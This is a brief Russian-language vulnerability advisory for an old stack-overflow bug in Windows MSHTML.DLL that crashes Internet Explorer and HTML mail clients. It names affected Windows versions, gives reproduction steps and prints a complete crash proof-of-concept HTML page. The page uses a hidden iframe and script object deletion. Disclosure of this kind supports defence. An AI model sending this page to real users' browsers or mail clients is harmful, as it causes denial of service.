Найдена уязвимость в MSHTML DLL. Возможно "убить" эту DLL с помощью стек-переполнения, используя скрипт в файле HTML. Это дает возможность "убивать" Internet Explorer, и, возможно, даже выполнять произвольный программный код на машине пользователя (хотя это еще не проверено).
Cистемы уязвимы:
Windows 98
Windows NT
Windows 2000
Данный баг эффективен против любой программы, использующей MSHTML.DLL (Internet Explorer, Outlook/Outlook Express и другие мыльницы с поддержкой HTML). Этот баг испытан, когда имеется дело с множественными окнами объектов, где одно получает данные. Чтобы воспроизвести ошибку, создайте объект JavaScript, установите свойство объекта из окна (этого объекта) получающего данные, удалите объект, и создайте его снова.
Exploit:
--------InstantCrash.html-----------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
---------------------------------------------
